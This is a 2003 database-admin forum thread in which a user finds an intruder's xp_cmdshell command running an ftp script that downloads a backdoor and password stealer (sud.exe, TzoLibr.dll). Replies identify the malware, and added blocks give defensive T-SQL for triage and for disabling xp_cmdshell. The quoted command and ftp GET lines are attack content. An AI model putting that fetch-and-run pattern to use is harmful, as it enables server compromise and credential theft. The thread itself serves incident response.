SQL Server Performance

xp_cmdshell "ftp -s:c:winntaxis.cmd"

Discussion in 'General DBA Questions' started by Jon M, Nov 6, 2003.

  1. Jon M Member

    I saw this on one of my processes (spid 53), and no internal developer/user is running this command. Could this be a virus or hacker?

    Anyone seen this before?

    Jon M
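    One way to triage a session like the one described above, as an added example that is not part of the thread: the spid (53) and the xp_cmdshell command text are taken from the post, the DMV queries assume SQL Server 2005 or later run by a sysadmin-equivalent login, and the SQL Server 2000 equivalents are shown in comments.

```sql
-- Added example (not from the thread): triage a suspicious session on SQL Server.
-- Assumes spid 53 is the session seen running xp_cmdshell "ftp -s:...".

-- 1. What is spid 53 running right now, who owns it, and where did it connect from?
SELECT s.session_id,
       s.login_name,
       s.host_name,
       s.program_name,
       s.login_time,
       c.client_net_address,
       t.text AS most_recent_batch
FROM sys.dm_exec_sessions AS s
JOIN sys.dm_exec_connections AS c ON c.session_id = s.session_id
OUTER APPLY sys.dm_exec_sql_text(c.most_recent_sql_handle) AS t
WHERE s.session_id = 53;
-- SQL Server 2000 equivalent: EXEC sp_who2 53; DBCC INPUTBUFFER(53);

-- 2. Are any other sessions calling xp_cmdshell at this moment?
SELECT r.session_id, s.login_name, s.host_name, t.text
FROM sys.dm_exec_requests AS r
JOIN sys.dm_exec_sessions AS s ON s.session_id = r.session_id
CROSS APPLY sys.dm_exec_sql_text(r.sql_handle) AS t
WHERE t.text LIKE '%xp_cmdshell%'
  AND r.session_id <> @@SPID;   -- exclude this query itself

-- 3. End the session. KILL only terminates the SQL Server session; the cmd.exe/ftp.exe
--    child that xp_cmdshell spawned keeps running under the service account and must
--    be stopped on the host, and the login it used should be disabled, not just killed.
KILL 53;
-- ALTER LOGIN [suspect_login] DISABLE;   -- 2005+; placeholder name, not from the thread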
  2. Luis Martin Moderator

  3. Jon M Member

    I think somebody's trying to hack my machine.

    This is the detail of the axis.cmd:
    open 444
    GET sud.ini
    GET TzoLibr.dll
    GET sud.exe

    Any help would be greatly appreciated.

    Jon M
  4. Jon M Member

    I couldn't even delete the process nor delete the user login.

    Jon M
  5. ChrisFretwell New Member

    I found some detail that may be of use when I went hunting the individual details in the axis.cmd that you listed.

    Tzolibr.dll is found in a few virus/trojan horses and info gathers.
    Sud.exe is listed as a backdoor thing-y (forgive my lack of technical use; if it's not SQL related, I probably don't know the language). It is a password stealer, so it's quite important that you deal with it immediately.

    There is some more detailed info about sud.exe at http://www3.ca.com/virusinfo/virus.aspx?ID=9739
    This is the closest MS info on it: http://www.microsoft.com/technet/security/bulletin/ms00-057.asp

    What you have looks like a version of this, probably with some basic file names to make it less detectable. Check the virus sites and Microsoft for information on removing this. Start with a Google search on sud.exe and see where it leads you, then subsearch etc., until you find an exact enough listing. And look into a good virus blocking tool and make sure you get updates regularly for it.

    Good luck and keep us posted.
  6. FrankKalis Moderator

    Piggy-backing on Chris I suggest you take a look at http:www.sqlsecurity.com .
    Very good information on how to secure your server.

    Hm... I think somewhere I have the source from Openhack 2002 on my computer. IIRC there was a description by Microsoft on the absolute minimum permission needed to run SQL Server. If wanted, just post and I'll dig.

    Sorry, too dumb to hack in the correct link this morning.
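    The hardening step that follows from the thread, as an added example not posted by anyone in it: turning off xp_cmdshell and checking who can still reach it. The `sp_configure 'xp_cmdshell'` option exists on SQL Server 2005 and later; for a SQL Server 2000 instance like the one discussed here the comments show the older approach of revoking EXECUTE (or dropping the extended procedure). The login name in the last statement is a placeholder.

```sql
-- Added example (not from the thread): disable xp_cmdshell and verify the setting.
-- SQL Server 2005 and later:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- Verify: value_in_use should be 0. Keep this in a periodic check, because an
-- attacker with sysadmin can turn it back on with the same two statements.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- Who has been granted EXECUTE on it directly (2005+)? By default only sysadmin
-- members can run it; any explicit grant here deserves a second look.
SELECT dp.name AS grantee, p.permission_name, p.state_desc
FROM master.sys.database_permissions AS p
JOIN master.sys.database_principals AS dp ON dp.principal_id = p.grantee_principal_id
WHERE p.major_id = OBJECT_ID('master.dbo.xp_cmdshell');

-- Review sysadmin membership too: every member can re-enable xp_cmdshell.
SELECT name FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- SQL Server 2000 equivalent (no sp_configure switch exists there):
-- REVOKE EXECUTE ON master.dbo.xp_cmdshell FROM public;
-- EXEC master.dbo.sp_dropextendedproc 'xp_cmdshell';   -- common 2000-era hardening
```

    Beyond the switch itself, the reason this command could fetch and run files at all is that the SQL Server service account was allowed to: run the service as a low-privilege local or domain account rather than LocalSystem, and the shell that xp_cmdshell spawns inherits only that account's rights.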
  7. Jon M Member

    Thanks for all the info guys.

    Jon M